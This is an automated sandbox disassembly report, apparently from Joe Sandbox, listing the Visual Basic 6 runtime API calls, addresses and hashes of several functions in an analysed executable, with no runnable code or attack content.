                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsBstrGenerateList$#616CopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1495372892-0
                                                                                    • Opcode ID: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                    • Instruction ID: a67bb8bcd321ef6f9d89d5af411f850dddceec761c9aca37c4a66d17d3038916
                                                                                    • Opcode Fuzzy Hash: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                    • Instruction Fuzzy Hash: 19C127B0E002199FCB14DFA5DD84AEEBBB9FB48300F50816EE50AA7250DB746985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004171D7 Relevance: 57.3, APIs: 38, Instructions: 310COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 00417209
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041722A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417233
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsGenerateList$#616BstrCopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 591398060-0
                                                                                    • Opcode ID: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                    • Instruction ID: 5850bdb2f8cb840655fe358dbb68f1bf167492e12e76f8ba6df4694bbfc137e4
                                                                                    • Opcode Fuzzy Hash: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                    • Instruction Fuzzy Hash: 88C117B0E002199FDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB746985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00417143 Relevance: 55.8, APIs: 37, Instructions: 288COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaInStr.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 00417157
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 00417180
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$BstrSystemUnlock$#616#631BoundsCopyGenerateListLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 4020600759-0
                                                                                    • Opcode ID: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                    • Instruction ID: 6f59f1f6fd00cf4eb64356afd8b00aa24b7c42f8971466ecdf1fdd0f8cb9e506
                                                                                    • Opcode Fuzzy Hash: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                    • Instruction Fuzzy Hash: D8C108B1E00218DFDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00417190 Relevance: 54.3, APIs: 36, Instructions: 286COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #709.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 004171A4
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$SystemUnlock$#616#631#709BoundsBstrCopyGenerateListLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 2767930602-0
                                                                                    • Opcode ID: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                    • Instruction ID: fd14dd4b6f58a52c042ba838fbe59068618bb76b1adec8898ddb627e80e0b945
                                                                                    • Opcode Fuzzy Hash: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                    • Instruction Fuzzy Hash: 6DB118B1E00218DFDB24DFA5DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004179F2 Relevance: 25.7, APIs: 17, Instructions: 200COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    • __vbaStrCat.MSVBVM60(?,004096D4,00000000,00000001), ref: 00417CE8
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417CEF
                                                                                    • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417CF7
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417CFE
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000), ref: 00417D05
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D0C
                                                                                    • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417D14
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D1B
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000), ref: 00417D20
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00417D41
                                                                                    • #618.MSVBVM60(00000000,00000003), ref: 00417D6E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D79
                                                                                    • __vbaStrCat.MSVBVM60(Function_00009254,004096CC,00000000), ref: 00417D86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D8D
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00417D90
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,660E6A76,660E6C30,660E9596), ref: 00418B33
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00418BE2), ref: 00418BB3
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00418BBC
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00418BC5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BD0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BD5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BDA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$SystemUnlock$BoundsGenerateList$#618Lock
                                                                                    • String ID:
                                                                                    • API String ID: 2878159455-0
                                                                                    • Opcode ID: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                    • Instruction ID: 2780b2efc1f4126fd3daf783c884f47e51bc0b84df1625baa5224246725a4293
                                                                                    • Opcode Fuzzy Hash: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                    • Instruction Fuzzy Hash: 9A7117B0E042189FCB14DFA9DDC4AEEBBB5FB48300F6081AEE509A7250DB745A85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004259A0 Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                    • #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                    • #570.MSVBVM60(00000000), ref: 00425A64
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                    • #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                    • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425AF7
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00425B08
                                                                                    • #616.MSVBVM60(00000000), ref: 00425B0B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B16
                                                                                    • __vbaStrCmp.MSVBVM60(?,00000000), ref: 00425B1D
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00425B3F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425B64
                                                                                    • __vbaStrMove.MSVBVM60(00000004,?), ref: 00425B79
                                                                                    • #618.MSVBVM60(00000000), ref: 00425B7C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B87
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00425B8A
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 00425BA5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00425BB9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425BCE
                                                                                    • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00425BD8
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B95
                                                                                      • Part of subcall function 00411210: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                      • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                      • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                      • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                      • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                      • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C10
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425C1B
                                                                                    • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C2C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425C37
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425C47
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00425C4C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425C55
                                                                                    • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00425C5A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00425C72
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425C81
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00425C8D
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00425C97
                                                                                    • #525.MSVBVM60(00001000), ref: 00425CA2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425CAD
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425CE3
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425CEC
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425CF4
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425CFD
                                                                                    • #525.MSVBVM60(?), ref: 00425D29
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425D34
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425D39
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425D42
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425D4A
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425D53
                                                                                    • #594.MSVBVM60(0000000A), ref: 00425D77
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425D80
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00425D9C
                                                                                    • #593.MSVBVM60(0000000A), ref: 00425DC6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DEF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DFD
                                                                                    • __vbaFpUI1.MSVBVM60 ref: 00425E1F
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425E37
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00425E5F
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425EAD
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425EB9
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • #593.MSVBVM60(0000000A), ref: 00425EF3
                                                                                    • __vbaFpI4.MSVBVM60 ref: 00425F15
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425F20
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00425F34
                                                                                    • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00425F4C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F57
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425F63
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F82
                                                                                    • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00425F91
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F95
